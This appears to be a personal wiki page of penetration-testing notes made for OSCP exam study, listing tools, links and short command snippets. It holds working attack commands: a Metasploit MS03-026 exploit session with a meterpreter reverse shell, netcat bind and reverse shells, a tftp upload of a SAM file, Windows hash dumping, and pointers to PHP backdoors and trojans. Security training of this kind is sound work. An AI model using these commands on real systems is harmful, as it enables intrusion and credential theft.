Hacking Notes
Jump to navigation
Jump to search
Contents
1 disclaimer
i wrote this notes while preparing myself for the "Offensive Security Certified Professional" exam.
scripts, links and infos on this site are for educational purposes only.
a knife is not bad, but you can do bad things with it.
i hope this site help others to improve their security skills.
enjoy it ...
2 security sites
- Offensive Security
- security trainings, creators of backtrack linux
- homepage: http://www.offensive-security.com
- SecurityFocus
- official collection of voluns
- homepage: http://www.securityfocus.com
- darknet
- useful audit tools
- homepage: http://www.darknet.org.uk
- CVE
- Common Vulnerabilities and Exposures
- homepage: http://cve.mitre.org/
- insecure
- top 100 security tools, and lot of other info and tools
- homepage:http://sectools.org
3 protecting privacy while surfing
- distributed network to hide your web access
- also known as tor proxy
- homepage: http://www.anonymox.net/
3.1 lists of free proxy servers
- http://proxy.speedtest.at/proxyOnlyAnonymous.php
- http://www.hidemyass.com/proxy-list
- http://www.google.com/search?q=anonymous proxy server list
for i in $(cat proxy.txt) do curl -m5 -x $i http://www.bitbull.ch/wanip.php >/dev/null 2>&1 && echo "$i" done
3.2 anonym emailing
- one time email addresses
- http://www.mailinator.com
- http://www.yopmail.com
- https://www.guerrillamail.com
4 information gathering
4.1 using google
- google advanced search operators
- http://www.googleguide.com/advanced_operators.html
- google hacking database, a nice place
- http://www.hackersforcharity.org/ghdb/
- http://www.exploit-db.com/google-dorks/
4.2 tools
4.2.1 web
./cms-explorer.pl -url http://mybooks.ch -type drupal ./revhosts pig getmail stiftung-buehl.ch ./revhosts pig Findsubdomains stiftung-buehl.ch ./revhosts pig vhh bitbull.ch #find all virtual hosts on this server
- online domains databases
- Domainsdb: http://www.domainsdb.net/
- IP Hunt: http://www.searchmee.com/web-info/ip-hunt.php
- Reverse IP: http://www.whois.sc/reverse-ip/
- Webhosting.info: http://whois.webhosting.info/
- Serversniff hostnames-on-ip: http://serversniff.net/content.php?do=hostonip
- Zone-h web defacement archive: http://www.zone-h.com/
- MAC-Adressen Hersteller Verzeichnis
- homepage: http://standards.ieee.org/regauth/oui/index.shtml
- file: http://standards.ieee.org/regauth/oui/oui.txt
- find all active ips in a subnet
arp-scan -I eth0 192.168.1.0/24
5 scanning
- nmap
- hervorragender portscanner, ist immer auf dem neussten stand
- homepage: http://nmap.org
- install nmap by rpm: rpm -Uhv http://nmap.org/dist/$(curl -s http://nmap.org/dist/ | egrep 'nmap-[1-9].*i386.rpm' | cut -d\" -f6 | tail -1)
- install nmap frontend zenmap by: rpm -Uhv http://nmap.org/dist/$(curl -s http://nmap.org/dist/ | grep zenmap | cut -d\" -f6 | tail -1)
- autoscan
- cool scanner, has a nice and easy customizable extension interface
- homepage: http://sourceforge.net/projects/autoscan/
- nessus
- great security scanner, must have
- homepage: http://www.nessus.org
- nikto
- Nikto is an web server scanner which performs comprehensive tests against web servers for multiple security items.
- homepage: http://www.cirt.net/code/nikto.shtml
6 password attacking
6.1 bruteforce tools
- hydra
- remote bruteforce password cracker for nearly all protocols :)
- homepage: http://freeworld.thc.org/releases.php
- rainbow tables
- crack hashes faster by using rainbow tables
- see: http://en.wikipedia.org/wiki/Rainbow_table
- web interface: http://cracker.offensive-security.com/
6.2 password lists
- wyd
- generates word lists from given web content
- homepage: http://www.remote-exploit.org/codes_wyd.html
- bugmenot
- free user accounts for many sites
- homepage: http://www.bugmenot.com
- some password lists
- http://www.milw0rm.com/mil-dic.php
- ftp://ftp.ox.ac.uk/pub/wordlists/
- http://gdataonline.com/downloads/GDict/
- http://www.theargon.com/achilles/wordlists/
- http://theargon.com/achilles/wordlists/theargonlists/
- ftp://ftp.cerias.purdue.edu/pub/dict/
- http://www.outpost9.com/files/WordLists.html
- http://www.securinfos.info/wordlists_dictionnaires.php
- http://www.vulnerabilityassessment.co.uk/passwords.htm
- http://packetstormsecurity.org/Crackers/wordlists/
- http://www.ai.uga.edu/ftplib/natural-language/moby/
- http://www.insidepro.com/eng/download.shtml
- http://www.word-list.com/
- http://www.cotse.com/tools/wordlists1.htm
- http://www.cotse.com/tools/wordlists2.htm
- http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
- http://wordlist.sourceforge.net/
6.3 password dumper
- pwdump
- dump winrows passwords
- see: http://en.wikipedia.org/wiki/Pwdump
6.4 physical access
- linux
- boot backtrack3
- copy, read, write /etc/shadow
- use jack the ripper to crack it
- get windows password hashes
- boot backtrack3
- mount ntfs filesystem
mount modprobe fuse ntfsmount /dev/hda1 /mnt/hda1
- dump the syskey bootkey from windows system hive
bkhive /mnt/hda1/WINNT/system32/config/system system.txt
- dump password hashes
samdump2 /mnt/hda1/WINNT/system32/config/SAM system.txt > hashes.txt
- set windows passwords
- boot backtrack3
- mount ntfs filesystem
mount modprobe fuse ntfsmount /dev/hda1 /mnt/hda1
- write new password
chntpw /mnt/hda1/WINNT/system32/config/SAM
7 arp poisoning
- ettercap
- nice cli/gui tool fof arp poisoning, man in the middle, dns poisoning, traffic modification ...
- homepage: http://ettercap.sourceforge.net/
- cain and abel
- windows tool like ettercap, windows guys like it
- homepage: http://www.oxid.it/
8 traffic analyzer
- wire shark
- well known gui/cli traffic analyzer, imports also tcpdump files
- homepage: http://www.wireshark.org/
- tcpdump
- console traffic analizer
- homepage: http://sourceforge.net/projects/tcpdump/
- iftop
- tool to monitor and trace bandwith issues
- homepage: http://www.ex-parrot.com/~pdw/iftop/
- WebScarab
- great http traffic analizer
- homepage: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
- WebGoat
- insecure webapp to teach security lessons
- homepage: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
9 exploiting
- milw0rm
- god collection of exploits and hacking background
- homepage: http://www.milw0rm.com/
- metasploit
- great exploiting framework
- homepage: http://www.metasploit.com/
- install framework3 on fC6: http://www.bitbull.ch/dl/scripts/install-framework3-fc6.sh
9.1 use db_autopwn
./msfconsole msf> load db_sqlite3 msf> db_create db_nmap -sV -PN -T4 192.168.0.111 db_autopwn -t
nmap -iL /root/ip.txt -PN -T4 -sV --host-timeout 5min -p21,22,25,80,135,139,110,143,445,443 -oX /tmp/scan.xml
9.2 use msfconsole
./msfconsole msf > search exploits rpc msf > use windows/dcerpc/ms03_026_dcom msf exploit(ms03_026_dcom) > search payloads windows.*reverse msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms03_026_dcom) > set RHOST 192.168.0.111 msf exploit(ms03_026_dcom) > set LHOST 192.168.0.151 msf exploit(ms03_026_dcom) > set LPORT 55555 msf exploit(ms03_026_dcom) > set Global ====== No entries in data store. Module: windows/dcerpc/ms03_026_dcom ==================================== Name Value ---- ----- AutoLoadStdapi true AutoRunScript ConnectTimeout 10 DCERPC::ReadTimeout 0 DCERPC::fake_bind_multi true DCERPC::fake_bind_multi_append 0 DCERPC::fake_bind_multi_prepend 0 DCERPC::max_frag_size 4096 DCERPC::smb_pipeio rw DLL /pentest/exploits/framework3/data/meterpreter/metsrv.dll EXITFUNC thread EnableContextEncoding false LHOST 192.168.0.151 LPORT 55555 PAYLOAD windows/meterpreter/reverse_tcp RHOST 192.168.0.111 RPORT 135 SSL false TARGET 0 TCP::max_send_size 0 TCP::send_delay 0 WfsDelay 0 msf exploit(ms03_026_dcom) > exploit
10 backdoors
10.1 php
- some nice backdoors for unix, php
- google: c99.txt r57.txt c100.txt
- http://www.google.ch/search?hl=de&q=c99.txt+r57.txt+c100.txt+filetype%3Atxt
10.2 windows trojans
- optix pro / beast / bifrost
- some interesting windows trojans
- spybot
- irc based trojan
- insider
- http based trojan, takes instructions by web server
- rxbot
- irc based, self distributing
11 div tools
- Back Track Linux Distro
- live linux distro for security audit
- http://www.remote-exploit.org/backtrack.html
- chkrootkit
- locally check for root kits
- homepage: http://www.chkrootkit.org/
- darkc0de
- interesting tools and scripts
- http://darkc0de.com/
- Lynis
- check default config and security settings on unix box
- homepage: http://www.rootkit.nl/projects/lynis.html
11.1 netcat notes
- simple chat
dst) nc -vv -l 4444 src) nc 192.168.8.110 4444
- file transfer
dst) nc -l 4444 > chris.leo src) cat chris.leo | nc 192.168.9.10 444 src) type chris.leo | nc.exe 192.168.9.10 444
- bind shell
dst) nc -l 4444 -e cmd src) nc 192.168.8.110 4444
- reverse shell
dst) nc -l 4444 src) nc -e cmd 192.168.8.110 4444
- port scanner
nc -z -w1 -v 192.168.9.10 4444-4445
- banner grabber
nc -vv 192.168.9.110 22
11.2 tftp notes
- get files (-i is only for win)
tftp -i 1.2.3.4 GET nc.exe
- put files (-i is only for win)
tftp 2.3.4.5 PUT sam
12 wireless
12.1 links
- web conversion
- convert wpa and wep key into words
- homepage: http://www.latinsud.com/wepconv.html
- aircrack-ng faq
- a must
- homepage: http://aircrack-ng.org/doku.php?id=faq